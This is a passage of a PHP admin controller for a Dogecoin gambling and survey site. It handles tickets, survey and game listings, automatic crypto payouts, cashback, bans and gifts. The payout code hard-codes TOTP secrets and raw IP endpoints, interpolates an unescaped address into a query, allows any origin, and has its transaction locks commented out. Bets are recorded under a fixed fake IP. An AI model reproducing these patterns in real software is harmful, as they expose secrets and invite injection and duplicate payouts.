		$total_pages = ceil($count_tickets / $this->Ticket->limit_entries);
		$pagination = $this->create_pagination($page_no, $total_pages, base_url().'adm/tickets.php');
		
		$data = array(
			'tickets'		=> $tickets,
			'pagination'	=> $pagination,
			'admin_settings'=> $this->admin_settings,
			'email'			=> $email,
			'user_info' 		=> $this->user_info,
			'menu'			=> 'tickets'
		);
		$this->load->view('admin/tickets', $data);
	}
	
	public function messages() {
		$ticket_code = substr($this->input->post_get('s'), 0, 8);
		$message_id = intval($this->input->post_get('e'));
		$edited_message = '';
		$ticket_id = $this->Ticket->get_ticket_id($ticket_code);
		if($ticket_id == 0) {
			show_404();
		} else {
			$get_ticket_info = $this->Ticket->get_ticket_info($ticket_id);
			$load_messages = $this->Message->get_all_messages_by_ticket($ticket_id);
			foreach($load_messages as $row) {
				if($row->time - time() < 86400) {
					$row->time =  $this->time_elapsed_string($row->time);
				} else {
					$row->time =  date('Y-m-d', $row->time);
				}
				if($row->message_id == $message_id) {
					$edited_message = $row->message;
				}
			}
			$is_spammer = $this->Ban->check_block_email($get_ticket_info->email);
			if($get_ticket_info->time_seen != 0) {
				$last_seen = $this->time_elapsed_string($get_ticket_info->time_seen);
			} else {
				$last_seen = '';
			}
			$data = array(
				'messages'		=> $load_messages,
				'subject'		=> $get_ticket_info->subject,
				'ticket_code'	=> $ticket_code,
				'message_id'	=> $message_id,
				'edited_message'=> $edited_message,
				'ticket_closed'	=> $get_ticket_info->closed,
				'email'			=> $get_ticket_info->email,
				'is_spammer'	=> $is_spammer,
				'user_info' 		=> $this->user_info,
				'last_seen'	=> $last_seen,
				'menu'			=> 'tickets'
			);
			$this->load->view('admin/messages', $data);
		}
	}
	
	public function surveys() {
		// --- 1) Trang hiện tại ---
		$page_no = (int)$this->input->post_get('p');
		if ($page_no < 1) $page_no = 1;

		// --- 2) Đọc các tham số lọc (POST/GET đều được) ---
		$user_id     = $this->input->post_get('user_id', true);        // int
		$survey_site = $this->input->post_get('survey_site', true);    // string
		$status      = $this->input->post_get('status', true);         // 1=Completed/Bonus, 2=Rejected
		$usd_min     = $this->input->post_get('usd_min', true);        // float
		$usd_max     = $this->input->post_get('usd_max', true);        // float

		// Chuẩn hoá kiểu dữ liệu (null nếu để trống)
		$user_id     = ($user_id === '' || $user_id === null) ? null : (int)$user_id;
		$survey_site = ($survey_site === '' || $survey_site === null) ? null : $survey_site;
		$status      = ($status === '' || $status === null) ? null : (int)$status;
		$usd_min     = ($usd_min === '' || $usd_min === null) ? null : (float)$usd_min;
		$usd_max     = ($usd_max === '' || $usd_max === null) ? null : (float)$usd_max;

		// --- 3) Gọi model filter_surveys (tên theo hàm bạn đã có) ---
		$get_surveys = $this->Survey->filter_surveys(
			$user_id,
			$survey_site,
			$status,
			$usd_min,
			$usd_max,
			$page_no
		);

		// --- 4) Build URL phân trang, giữ nguyên các tham số lọc ---
		$query_params = [];
		if (!is_null($user_id))     $query_params['user_id']     = $user_id;
		if (!is_null($survey_site)) $query_params['survey_site'] = $survey_site;
		if (!is_null($status))      $query_params['status']      = $status;
		if (!is_null($usd_min))     $query_params['usd_min']     = $usd_min;
		if (!is_null($usd_max))     $query_params['usd_max']     = $usd_max;

		// không đưa p vào query base của pagination
		$base_url = base_url().'adm/surveys.php';
		$base_url_with_query = $base_url . (!empty($query_params) ? ('?' . http_build_query($query_params)) : '');

		$pagination = $this->create_pagination(
			$page_no,
			$get_surveys['total_pages'],
			$base_url_with_query
		);

		$statistics = $get_surveys['statistics'];

		// --- 5) Lấy danh sách Reject của user (nếu có truyền user_id) ---
		$reject_surveys = null;
		if (!is_null($user_id)) {
			$reject_surveys = $this->Survey->get_all_reject_surveys($user_id);
		}
		
		// --- 6) Render view ---
		$data = [
			'get_surveys'     => $get_surveys['data'],
			'pagination'      => $pagination,
			'admin_settings'  => $this->admin_settings,
			'statistics'      => $statistics,
			'DOGE_price'       => $this->DOGE_price,
			'menu'            => 'surveys',
			'user_info'       => $this->user_info,
			'reject_surveys'  => $reject_surveys,

			// Gửi lại filters cho view hiển thị/giữ trạng thái form
			'filters' => [
				'user_id'     => $user_id,
				'survey_site' => $survey_site,
				'status'      => $status,
				'usd_min'     => $usd_min,
				'usd_max'     => $usd_max,
			],
		];

		$this->load->view('admin/surveys', $data);
	}
	
	public function games() {
		if($this->input->post_get('p') != '') {
			$page_no = intval($this->input->post_get('p'));
		} else {
			$page_no = 1; 
		}
		if($this->input->post_get('uid') != '') {
			$uid = intval($this->input->post_get('uid'));
		} else {
			$uid = 0; 
		}
		if($this->input->post_get('game') != '') {
			$game_title = $this->input->post_get('game');
		} else {
			$game_title = 'All'; 
		}
		$total_games = $this->Game->get_number_games($uid, $game_title);
		$games = $this->Game->load_user_bet_history($uid, $page_no, $game_title);
		$get_user_info = $this->User->get_user_info_by_id($uid);
		$total_pages = ceil($total_games / $this->Game->limit_entries);
		$statistics = $this->Game->get_statistics($uid);
		if($uid != 0) {
			if($game_title != '') {
				$pagination = $this->create_pagination($page_no, $total_pages, base_url().'adm/games.php?uid='.$uid.'&game='.$game_title);
			} else {
				$pagination = $this->create_pagination($page_no, $total_pages, base_url().'adm/games.php?uid='.$uid);
			}
			
		} else {
			if($game_title != '') {
				$pagination = $this->create_pagination($page_no, $total_pages, base_url().'adm/games.php?game='.$game_title);
			} else {
				$pagination = $this->create_pagination($page_no, $total_pages, base_url().'adm/games.php');
			}
		}
		$data = array(
			'games'			=> $games,
			'pagination'	=> $pagination,
			'admin_settings'=> $this->admin_settings,
			'statistics'	=> $statistics,
			'user_id'		=> $uid,
			'get_user_info'	=> $get_user_info,
			'user_info' 		=> $this->user_info,
			'menu'			=> 'games'
			
		);
		$this->load->view('admin/games', $data);
	}
	
	public function auto_payout() {
		header('Access-Control-Allow-Origin: *');

		$allow_auto_payout = $this->isSettingEnabled('allow_auto_payout');
		if (!$allow_auto_payout) {
			echo json_encode(['ret' => 0, 'mes' => 'Autopay disabled']);
			return;
		}

		$last_auto_payout = intval($this->getSettingData('last_auto_payout'));
		if ($last_auto_payout >= time() - 30) {
			echo json_encode(['ret' => 0, 'mes' => 'Too many requests']);
			return;
		}

		$get_pending_withdrawal = $this->Request->get_pending_withdrawal();
		if ($get_pending_withdrawal == null) {
			$this->db->trans_complete();
			echo json_encode(['ret' => 0, 'mes' => 'No requests need to pay']);
			return;
		}

		$request_id = $get_pending_withdrawal->request_id;
		if ($request_id == 0) {
			$this->db->trans_complete();
			echo json_encode(['ret' => 0, 'mes' => 'Invalid request ID']);
			return;
		}

		// Use SQL-level lock to avoid race condition
		//$this->db->trans_start();
		$request_info = $this->Request->get_request_info_by_id($request_id);
		
		if (!$request_info || $request_info->status === 'Completed') {
			//$this->db->trans_complete();
			echo json_encode(['ret' => 0, 'mes' => 'Duplicate or invalid request']);
			return;
		}

		$address = $request_info->address;
		$amount = $request_info->amount;
		$fee = $this->withdrawal_fee;
		$wallets = $this->Wallet->get_all_deposit_wallets("'$address'");
		$sender = $this->User->get_user_info_by_id($request_info->user_id);

		if ($sender->pending_balance + 1 < $amount) {
			//$this->db->trans_complete();
			echo json_encode(['ret' => 0, 'mes' => 'Insufficient user balance']);
			return;
		}

		$this->saveSettingData('last_auto_payout', time());

		if ($wallets != null) {
			// Internal transfer
			$wallet_info = $wallets[0];

			$clone_sender = clone $sender;
			$clone_sender->pending_balance -= $amount;
			$clone_sender->total_withdrawals += $amount;
			$this->User->update_user_info($sender, $clone_sender);

			$DOGE_price = $this->get_cryptocurrency_price('DOGE');
			$USD_value = number_format($amount / $this->UNITS_PER_COIN * $DOGE_price, 2, '.', '');
			$txid = substr(md5('DOGE' . $request_id), 0, 16);
			$this->Request->complete_withdrawal_request($request_id, $txid, $USD_value);
			
			if($sender->payment_notifications) {
				$this->Notification->create_notification($sender->user_id, 'Your transaction has been completed.', 'success');
			}

			$received_amount = $amount - $fee;
			$receiver = $this->User->get_user_info_by_id($wallet_info->user_id);
			$this->User->update_user_info_by_id($receiver->user_id, 'processing_balance', $receiver->processing_balance + $received_amount);
			$insert_id = $this->Request->create_request($receiver->user_id, 'Deposit', $received_amount, $address, $txid);
			$this->Request->confirm_request($insert_id);
			$today = date("Y-m-d");
			$withdrawals_today = $this->Statistic->get_statistic_by_date('withdrawals', $today);
			$this->Statistic->set_statistic_by_date('withdrawals', $withdrawals_today + $amount, $today);

			//$this->db->trans_complete();
			echo json_encode(['ret' => 1, 'mes' => 'The withdrawal request #' . $request_id . ' is completed']);
			return;
		}

		// External transfer (release DB lock first)
		if($amount > 1 * 1e8) {
			$this->Request->process_withdrawal_request($request_id, '', 0);
		}
		

		$value = number_format(($amount - $fee) / $this->UNITS_PER_COIN, $this->COIN_DECIMALS, '.', '');
		$type = 'Slow';
		$g = new GoogleAuthenticator();

		try {
			$txid = @file_get_contents("http://194.233.92.165/doge_api/payout.php?add=$address&val=$value&type=$type&sid=" . $this->create_random_key(5) . $g->getCode("LESXYADT58CVAFGZ") . $this->create_random_key(5));
			//$txid = @file_get_contents("http://158.220.96.161/doge_api/payout.php?add=$address&val=$value&type=$type&sid=" . $this->create_random_key(5) . $g->getCode("LESXYADT52CVAFGY") . $this->create_random_key(5));
		} catch (Exception $e) {
			$txid = 'Undefined_TXID';
		}

		if ($txid === 'Invalid code!') {
			echo json_encode(['ret' => 0, 'mes' => 'Invalid code!']);
			//$this->db->trans_complete();
			return;
		}

		if (!empty($txid)) {
			$DOGE_price = $this->get_cryptocurrency_price('DOGE');
			$USD_value = number_format($amount / $this->UNITS_PER_COIN * $DOGE_price, 2, '.', '');
			$this->Request->process_withdrawal_request($request_id, $txid, $USD_value);
			$today = date("Y-m-d");
			$withdrawals_today = $this->Statistic->get_statistic_by_date('withdrawals', $today);
			$this->Statistic->set_statistic_by_date('withdrawals', $withdrawals_today + $amount, $today);

			echo json_encode(['ret' => 1, 'mes' => 'The request #' . $request_id . ' is being processed!']);
			$this->Log->create_log(-1, 'Autopay request #' . $request_id, $this->get_client_ip());
		} else {
			echo json_encode(['ret' => 0, 'mes' => 'Could not send payment request! ' . $txid]);
		}
		
		//$this->db->trans_complete();
		
	}
	
	//auto cashback 29092024
	public function auto_cashback() {
		$allow_auto_cashback = $this->isSettingEnabled('allow_auto_cashback');
		if(!$allow_auto_cashback) {
			echo json_encode(array('ret' => 0, 'mes' => 'Auto cashback disabled'));
			return;
		}
		$user_id = $this->User->find_user_to_send_cashback();
		if($user_id != null) {
			$user_info = $this->User->get_user_info_by_id($user_id);
			if($user_info->temp_bet_balance >= 0) {
				echo json_encode(array('ret' => 0, 'mes' => 'Temp bet balance has already reset!'));
			} else {
				$cashback_amount = max(0, intval(-$user_info->temp_bet_balance / 20));
				$this->User->update_user_info_by_id($user_id, 'available_commission_balance', $user_info->available_commission_balance + $cashback_amount, 0);
				$this->User->update_user_info_by_id($user_id, 'temp_bet_balance', 0);
				$this->Bonus->insert_entry($user_id, $cashback_amount, 'Pay cashback');
				
				if($user_info->referrer != 0) {
					$get_referrer = $this->User->get_user_info_by_id($user_info->referrer);
					if($get_referrer != null) {
						$referral_cashback_amount = $cashback_amount / 2;
						$this->User->update_user_info_by_id($get_referrer->user_id, 'available_commission_balance', $get_referrer->available_commission_balance + $referral_cashback_amount, 0);
						$this->User->update_user_info_by_id($get_referrer->user_id, 'temp_bet_balance', max(0,  $get_referrer->temp_bet_balance - $referral_cashback_amount * 20));
						$this->Bonus->insert_entry($get_referrer->user_id, $referral_cashback_amount, 'Pay referral cashback');
					}
				}
				
				
				echo json_encode(array('ret' => 1, 'mes' => 'Reset and pay cashback user #'.$user_id.' successfully!'));
			}
		} else {
			echo json_encode(array('ret' => 1, 'mes' => 'Invalid user id!'));
		}
	}
	//auto cashback 29092024
	
	public function complete_processing_request() {
		header('Access-Control-Allow-Origin: *');
		$allow_auto_payout = $this->isSettingEnabled('allow_auto_payout');
		if(!$allow_auto_payout) {
			echo json_encode(array('ret' => 0, 'mes' => 'Autopay disabled'));
			return;
		}
		$random_processing_request = $this->Request->get_random_processing_request();
		if($random_processing_request != null) {
			$txid = $random_processing_request->proof;
			$request_id = $random_processing_request->request_id;
			$user_id = $random_processing_request->user_id;
			$amount = $random_processing_request->amount;
			
			//lock request//
			if($this->cache->get('lock_check_status_'.$request_id) != null) {
				echo json_encode(array('ret' => 0, 'mes' => 'This transaction is being locked!'));
				return;
			}
			$this->cache->save('lock_check_status_'.$request_id, 1, 60);
			//lock request//
			
			$transaction_info = $this->blockdaemon_get_transaction_info($txid);
			if($transaction_info != null) {
				$this->Request->complete_withdrawal_request($request_id, $txid);
				///////////////////
				$user_info = $this->User->get_user_info_by_id($user_id);
				$updated_info = clone($user_info);
				$updated_info->pending_balance -= $amount;
				$updated_info->total_withdrawals += $amount;
				$this->User->update_user_info($user_info, $updated_info);
				///////////////////
				
				if ($user_info->payment_notifications) {
					$amount_in_DOGE = $amount / 1e8;
					$formatted_amount = (floor($amount_in_DOGE) == $amount_in_DOGE)
						? intval($amount_in_DOGE)
						: rtrim(rtrim(number_format($amount_in_DOGE, 8, '.', ''), '0'), '.');
					$message = 'You have successfully withdrawn ' . $formatted_amount .
						' DOGE. You can check it on the <a href="https://dogechain.info/tx/' .
						$txid . '">blockchain</a>.';
					$this->Notification->create_notification($user_info->user_id, $message, 'success');
				}
				
				$latest_trustpilot_noti = $this->Notification->get_latest_trustpilot_notification($user_id);
				if($latest_trustpilot_noti == 0 || $latest_trustpilot_noti < time() - 86400 * 30) {
					$this->Notification->create_notification($user_id, 'If you are satisfied with our services, please help us by leaving a review of the website on <a href="https://www.trustpilot.com/review/dogepick.io">Trustpilot</a>. You can also leave a comment to help us improve and provide the best services to our customers.', 'success');
				}
				
				
				echo json_encode(array('ret' => 1, 'mes' => 'The withdrawal requests with txid '.$txid .' have been completed'));
			} else {
				echo json_encode(array('ret' => 1, 'mes' => 'The withdrawal requests with txid '.$txid .' have NOT been completed'));
			}
			
			if($this->cache->get('lock_check_status_'.$request_id)) {
				$this->cache->delete('lock_check_status_'.$request_id);
			}
			
		} else {
			echo json_encode(array('ret' => 0, 'mes' => 'No requests need to confirm'));
		}
		
	}
	
	
	public function process() {
		$action = $this->input->post_get('action');
		switch($action) {
			case 'change_settings':
			$this->process_change_settings();
			break;
			case 'bonus':
			$this->process_bonus();
			break;
			case 'place_bet':
			$this->process_place_bet();
			break;
			case 'create_gift':
			$this->process_create_gift();
			break;
			case 'create_xmas_gift':
			$this->process_create_xmas_gift();
			break;
			case 'ban':
			$this->process_ban();
			break;
			case 'unban':
			$this->process_unban();
			break;
			case 'unban2':
			$this->process_unban2();
			break;
			case 'create_ticket':
			$this->process_create_ticket();
			break;
			case 'reply_ticket':
			$this->process_reply_ticket();
			break;
			case 'close_ticket':
			$this->process_close_ticket();
			break;
			case 'reopen_ticket':
			$this->process_reopen_ticket();
			break;
			case 'edit_message':
			$this->process_edit_message();
			break;
			case 'block_sender':
			$this->process_block_sender();
			break;
			case 'unblock_sender':
			$this->process_unblock_sender();
			break;
			case 'notify':
			$this->process_notify();
			break;
			case 'payout':
			$this->process_payout();
			break;
			case 'check_processing_request':
			$this->process_check_processing_request();
			break;
			case 'edit_txid':
			$this->process_edit_txid();
			break;
			case 'clean_bet_data':
			$this->process_clean_bet_data();
			break;
			case 'clean_log_data':
			$this->process_clean_log_data();
			break;
			case 'cancel_request':
			$this->process_cancel_request();
			break;
			case 'enable_commission':
			$this->process_enable_commission();
			break;
			case 'disable_commission':
			$this->process_disable_commission();
			break;
			case 'enable_referrer_commission':
			$this->process_enable_referrer_commission();
			break;
			case 'disable_referrer_commission':
			$this->process_disable_referrer_commission();
			break;
			case 'enable_payout':
			$this->process_enable_payout();
			break;
			case 'disable_payout':
			$this->process_disable_payout();
			break;
			//15092024
			case 'enable_survey':
			$this->process_enable_survey();
			break;
			case 'disable_survey':
			$this->process_disable_survey();
			break;
			//15092024
			case 'enable_auto_payout':
			$this->process_enable_auto_payout();
			break;
			case 'disable_auto_payout':
			$this->process_disable_auto_payout();
			break;
			case 'enable_auto_payout2':
			$this->process_enable_auto_payout2();
			break;
			case 'disable_auto_payout2':
			$this->process_disable_auto_payout2();
			break;
			//auto cashback 29092024
			case 'enable_auto_cashback':
			$this->process_enable_auto_cashback();
			break;
			case 'disable_auto_cashback':
			$this->process_disable_auto_cashback();
			break;
			//auto cashback 29092024
			//stamina feature
			case 'enable_stamina':
			$this->process_enable_stamina();
			break;
			case 'disable_stamina':
			$this->process_disable_stamina();
			break;
			//stamina feature
			case 'reset_temp_profit':
			$this->process_reset_temp_profit();
			break;
			case 'reset_and_pay_cashback':
			$this->process_reset_and_pay_cashback();
			break;
			case 'pay_contest_reward':
			$this->process_pay_contest_reward();
			break;
			case 'repay':
			$this->process_repay();
			break;
			case 'change_referrer':
			$this->process_change_referrer();
			break;
			case 'correct_email':
			$this->process_correct_email();
			break;
			case 'fix_balance_discrepancy':
			$this->process_fix_balance_discrepancy();
			break;
			//handle_selected_users
			case 'handle_selected_users':
			$this->process_handle_selected_users();
			break;
			//handle_selected_users
			case 'backup_db':
			$this->process_backup_db(true);
			break;
			//group feature
			case 'create_group':
			$this->process_create_group();
			break;
			case 'delete_group':
			$this->process_delete_group();
			break;
			case 'add_user_to_group':
			$this->process_add_user_to_group();
			break;
			case 'remove_user_from_group':
			$this->process_remove_user_from_group();
			break;
			//group feature
			default:
			echo json_encode(array('ret' => 0, 'mes' => 'Invalid input!'));
			break;
		}
	}
	
	public function load() {
		$data = $this->input->post_get('data');
		switch($data) {
			case 'cashflow_by_date_range':
			$this->load_cashflow_by_date_range();
			break;
			case 'cashflow_from_user_by_date_range':
			$this->load_cashflow_from_user_by_date_range();
			break;
			case 'cashflow_from_referrer_by_date_range':
			$this->load_cashflow_from_referrer_by_date_range();
			break;
			//group feature
			case 'cashflow_from_group_by_date_range':
			$this->load_cashflow_from_group_by_date_range();
			break;
			//group feature
			case 'registered_users_by_range':
			$this->load_registered_users_by_range();
			break;
			case 'registered_users_by_referrer_range':
			$this->load_registered_users_by_referrer_range();
			break;
			case 'survey_summary_by_day':
			$this->load_survey_summary_by_day();
			break;
			case 'game_stats_by_day':
			$this->load_game_stats_by_day();
			break;
			default:
			echo json_encode(array('ret' => 0, 'mes' => 'Invalid input!'));
			break;
		}
	}
	
	public function process_change_settings() {
		$group_settings = $this->input->post_get('group_settings');
		$key = $this->input->post_get('key');
		$val = $this->input->post_get('val');
		if(isset($this->admin_settings[$group_settings]) && isset($this->admin_settings[$group_settings][$key])) {
			$this->admin_settings[$group_settings][$key] = $val;
			file_put_contents('application/controllers/admin_settings', serialize($this->admin_settings));
			echo json_encode(array('ret' => 0, 'mes' => 'Change setting successfully!'));
		} else {
			echo json_encode(array('ret' => 0, 'mes' => 'Something went wrong!'));
		}
	}

	public function process_bonus() {
		$user_id = intval($this->input->post_get('user_id'));
		$amount = floatval($this->input->post_get('amount'));
		$bonus_unit = $this->input->post_get('bonus_unit');
		if($bonus_unit == 'usd') {
			$amount = intval($amount * $this->UNITS_PER_COIN / $this->DOGE_price);
		} else {
			$amount = intval($amount * $this->UNITS_PER_COIN);
		}
		$message = $this->input->post_get('message');
		if($user_id == 0 || $amount == 0) {
			echo json_encode(array('ret' => 0, 'mes' => 'Please enter the required fields!'));
		} else {
			$get_user_info = $this->User->get_user_info_by_id($user_id);
			if($get_user_info == null) {
				echo json_encode(array('ret' => 0, 'mes' => 'Account does not exist!'));
			} else if($amount > 10000 * $this->UNITS_PER_COIN) {
				echo json_encode(array('ret' => 0, 'mes' => 'Not enough dogecoins to do this action!'));
			} else if($amount <= 0) {
				echo json_encode(array('ret' => 0, 'mes' => 'Please enter amount of dogecoins or free spins need to bonus'));
			} else {
				$updated_info = clone($get_user_info);
				$updated_info->available_commission_balance += $amount;
				$this->User->update_user_info($get_user_info, $updated_info);
				$this->Bonus->insert_entry($user_id, $amount, ucfirst($message));
				echo json_encode(array('ret' => 1, 'mes' => 'Bonus dogecoins successfully!'));
			}
		}
	}
	
	public function process_place_bet() {
		$user_id = intval($this->input->post_get('user_id'));
		$amount = floatval($this->input->post_get('amount'));
		$amount = intval($amount * 100000000);

		if($user_id == 0 || ($amount == 0)) {
			echo json_encode(array('ret' => 0, 'mes' => 'Please enter the required fields!'));
		} else {
			$get_user_info = $this->User->get_user_info_by_id($user_id);
			if($get_user_info == null) {
				echo json_encode(array('ret' => 0, 'mes' => 'Account does not exist!'));
			} else if($amount <= 0) {
				echo json_encode(array('ret' => 0, 'mes' => 'Please enter amount of dogecoins need to place bet'));
			} else {	
				$game_id = $this->Game->create_new_game(
					$get_user_info->user_id,
					$get_user_info->user_name,
					'192.168.0.1',
					'Dice',
					$get_user_info->nonce,
					$get_user_info->client_seed,
					$get_user_info->server_seed,
					$get_user_info->server_seed_hash,
					$amount,
					$amount,
					json_encode(array()),
					json_encode(array()),
					$amount,
					time(),
					time()
				);
				$this->User->update_user_bet_data($get_user_info, $amount, $amount, $get_user_info->balance, $this->create_random_key(64));
				echo json_encode(array('ret' => 1, 'mes' => 'Place bet successfully!'));
			}
		}
	}

	public function process_create_gift() {
		$user_id = intval($this->input->post_get('user_id'));
		$amount = floatval($this->input->post_get('amount'));
		$amount = intval($amount * $this->UNITS_PER_COIN);
		$note = $this->input->post_get('note');
		
		if($amount > 1000 * $this->UNITS_PER_COIN) {
			echo json_encode(array('ret' => 0, 'mes' => 'Not enough dogecoins to do this action!'));
		} else if($amount <= 0 ) {
			echo json_encode(array('ret' => 0, 'mes' => 'Amount must be greater than 0!'));
		} else {
			$gift_code = $gift_code = strtoupper($this->create_random_key(4).'-'.$this->create_random_key(6).'-'.$this->create_random_key(4));
			$this->Gift->create_gift($gift_code, $user_id, $amount, $note);
			echo json_encode(array('ret' => 1, 'mes' => 'Create gift successfully!'));
		}
	}
	
	public function process_create_xmas_gift() {
		$user_id = intval($this->input->post_get('user_id'));
		$amount = floatval($this->input->post_get('amount'));
		$amount_in_koinu  = intval($amount * $this->UNITS_PER_COIN);
		$note = 'Xmas gift';
		$get_user_info = $this->User->get_user_info_by_id($user_id);
		if($get_user_info == null) {
			echo json_encode(array('ret' => 0, 'mes' => 'Invalid user!'));
		} else if($amount_in_koinu > 5000 * $this->UNITS_PER_COIN) {
			echo json_encode(array('ret' => 0, 'mes' => 'Not enough DOGE to do this action!'));
		} else if($amount_in_koinu <= 0 ) {
			echo json_encode(array('ret' => 0, 'mes' => 'Amount must be greater than 0!'));
		} else {
			$gift_code = $gift_code = strtoupper($this->create_random_key(4).'-'.$this->create_random_key(6).'-'.$this->create_random_key(4));
			$this->Gift->create_gift($gift_code, $user_id, $amount_in_koinu, $note);
			
			$message = '';
			$message .= '<div style="font-family: \"Arial\", sans-serif; margin: 0; padding: 0; background: #f9f9f9; color: #333;">';
			$message .= '    <div style="max-width: 600px; margin: 50px auto 20px; background: #ffffff; border-radius: 8px; overflow: hidden; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);">';
			$message .= '        <div style="background-color: #e63946; color: white; padding: 20px; text-align: center;">';
			$message .= '            <h1 style="margin: 0; font-size: 2rem;">Merry Christmas and Happy New Year!</h1>';;
			$message .= '        </div>';
			$message .= '        <div style="padding: 20px; text-align: center;">';
			$message .= '            <p style="font-size: 1.5rem; line-height: 1.5;">Dear '.$get_user_info->user_name.',</p>';
			$message .= '            <p style="font-size: 1.5rem; line-height: 1.5;">As the holiday season is upon us, we want to express our gratitude for being part of our journey this year. To celebrate, we have a special gift just for you!</p>';
			$message .= '            <p style="font-size: 1.5rem; line-height: 1.5;">Your exclusive gift code is:</p>';
			$message .= '            <div style="display: inline-block; margin: 20px 0; padding: 10px 20px; font-size: 2rem; color: #e63946; background-color: #ffe5e5; border: 1px dashed #e63946; border-radius: 5px; font-weight: bold;">'.$gift_code.'</div>';
			$message .= '            <p style="font-size: 1.5rem; line-height: 1.5;">Redeem your code on our platform and enjoy your holiday surprise!</p>';
			$message .= '            <p style="font-size: 1.5rem; line-height: 1.5;">Click the link below to redeem your gift:</p>';
			$message .= '            <p style="font-size: 1.5rem; line-height: 1.5;"><a href="'.base_url().'gifts.php" target="_blank" style="color: #e63946; text-decoration: none;">'.base_url().'gifts.php</a></p>';
			$message .= '            <p style="font-size: 1.5rem; line-height: 1.5;">Thank you for your continued support. Wishing you a joyful Christmas and a prosperous New Year!</p>';
			$message .= '        </div>';
			$message .= '        <div style="background-color: #f4f4f4; padding: 10px; text-align: center; font-size: 1.3rem; color: #777;">';
			$message .= '            <p>With warm wishes,<br>The Dogepick Team</p>';
			$message .= '        </div>';
			$message .= '    </div>';
			$message .= '</div>';
			$user_email = $get_user_info->user_email;
			$ticket_code = $this->create_random_key(8);
			
			$ticket_subject = 'Merry Christmas And Happy New Year!';
			$ticket_id = $this->Ticket->create_new_ticket(-1, $user_email, 'Admin', $ticket_subject, $ticket_code);
			if($ticket_id != 0) {
				$this->Message->insert_new_message(-1, '', $ticket_id, $message);
			}
			
			$email_subject = '[Ticket:'.$ticket_code .'] Merry Christmas And Happy New Year!';
			$email_content = 'A support ticket has been created in our system for you. To manage or update your ticket, please visit: <br/> <a href="'.base_url().'ticket.php?s='.$ticket_code.'">'.base_url().'ticket.php?s='.$ticket_code.'</a>'; 
			//$ret = file_get_contents("https://dogepick.io/brevo/index.php?act=send_mail&from_mail=support@dogepick.io&from_name=support@dogepick.io&to_mail=".$user_email."&to_name=".$user_email."&subject=".rawurlencode($email_subject)."&body=".rawurlencode($email_content));
			$ret = file_get_contents("http://".$this->sending_email_ip."/m4i1/index4.php?act=send_support_ticket&subject=".rawurlencode($email_subject)."&from_mail=support@dogepick.io&from_name=support@dogepick.io&to_mail=".$user_email."&to_name=".$user_email."&ticket_code=".$ticket_code);
			$this->Notification->create_notification($user_id, 'A support ticket has been created in our system for you. To manage or update your ticket, please visit: <br/> <a href="'.base_url().'ticket.php?s='.$ticket_code.'">'.base_url().'ticket.php?s='.$ticket_code.'</a>', 'info');
			echo json_encode(array('ret' => 1, 'mes' => $ret));
		}
	}
	
	public function process_ban() {
		$ban_object = $this->input->post_get('ban_object');
		$ban_time = intval($this->input->post_get('ban_time'));
		$reason = $this->input->post_get('reason');
		$ban_time = $ban_time * 3600;
		if($ban_object == '') {
			echo json_encode(array('ret' => 0, 'mes' => 'Please enter user id or IP!'));
		} else {
			if(filter_var($ban_object, FILTER_VALIDATE_IP)) {
				$ip = $ban_object;
				$user_id = 0;
				$user_token = '';
			} else if(strlen($ban_object) == 16){
				$ip = 0;
				$user_id = 0;
				$user_token = $ban_object;
			} else {
				$ip = 0;
				$user_id = intval($ban_object);
				//$get_user_info = $this->User->get_user_info_by_id($user_id);
				$user_token = '';
			}
			if($ban_time == 0) {
				$expired_date = 0;
				if($user_id != 0) {
					$this->User->update_user_info_by_id($user_id, 'banned', 1);
					$get_user_info = $this->User->get_user_info_by_id($user_id);
					//sendAccountTerminationEmail('support@dogepick.io', 'support@dogepick.io', $get_user_info->user_email, $get_user_info->user_name);
				}
			} else {
				$expired_date = $ban_time + time();
			}
			$this->Ban->ban_user($user_id, $ip, $user_token, time(), $expired_date, $reason);
			echo json_encode(array('ret' => 1, 'mes' => 'Ban user successfully!'));
		}
	}
	
	public function process_unban() {
		$ban_id = $this->input->post_get('ban_id');
		if($ban_id == '') {
			echo json_encode(array('ret' => 0, 'mes' => 'Ban ID is not correct!'));
		} else {
			$this->Ban->unban($ban_id);
			$user_id = $this->Ban->get_user_id($ban_id);
			if($user_id != 0) {
				$this->User->update_user_info_by_id($user_id, 'banned', 0);
			}
			echo json_encode(array('ret' => 1, 'mes' => 'Unban user successfully!'));
		}
	}

	public function process_unban2() {
		$user_id = $this->input->post_get('user_id');
		if($user_id != 0) {
			$this->User->update_user_info_by_id($user_id, 'banned', 0);
		}
		echo json_encode(array('ret' => 1, 'mes' => 'Unban user successfully!'));
	}
	
	public function process_create_ticket() {
		$ticket_code = $this->create_random_key(8);
		$user_email = $this->input->post_get('email');
		$ticket_subject = $this->input->post_get('subject');
		$email_subject = '[Ticket:'.$ticket_code .'] '.$ticket_subject;
		$message = $this->input->post_get('message');
		$email_content = 'A support ticket has been created in our system for you. To manage or update your ticket, please visit: <br/> <a href="https://dogepick.io/ticket.php?s='.$ticket_code.'">https://dogepick.io/ticket.php?s='.$ticket_code.'</a>'; 
		if($user_email == '' || $email_subject == '' || $email_content == '') {
			echo json_encode(array('ret' => 0, 'mes' => 'Please fill in all fields!'));
		} else if(!filter_var($user_email, FILTER_VALIDATE_EMAIL)) {
			echo json_encode(array('ret' => 0, 'mes' => 'Email must be a valid email!'));
		} else {
			$email_content = nl2br($email_content);
			//$ret = file_get_contents(base_url()."/brevo/index.php?act=send_mail&from_mail=support@dogepick.io&from_name=support@dogepick.io&to_mail=".$user_email."&to_name=".$user_email."&subject=".rawurlencode($email_subject)."&body=".rawurlencode($email_content));
			$ret = file_get_contents("http://".$this->sending_email_ip."/m4i1/index4.php?act=send_support_ticket&subject=".rawurlencode($email_subject)."&from_mail=support@dogepick.io&from_name=support@dogepick.io&to_mail=".$user_email."&to_name=".$user_email."&ticket_code=".$ticket_code);
			if($ret == 'Message has been sent') {
				
				$ticket_id = $this->Ticket->create_new_ticket(-1, $user_email, 'Admin', $ticket_subject, $ticket_code);
				if($ticket_id != 0) {
					$this->Message->insert_new_message(-1, '', $ticket_id, $message);
				}
				echo json_encode(array('ret' => 1, 'mes' => $ret));
			} else {
				echo json_encode(array('ret' => 0, 'mes' => $ret));
			}
		}
	}
	
	public function process_reply_ticket() {
		$user_name = $email = $subject = $message = "";
		$email = $this->input->post_get('email');
		$email = filter_var($email, FILTER_SANITIZE_EMAIL);
		$subject = $this->input->post('subject');
		$subject = trim(filter_var($subject, FILTER_SANITIZE_STRING));
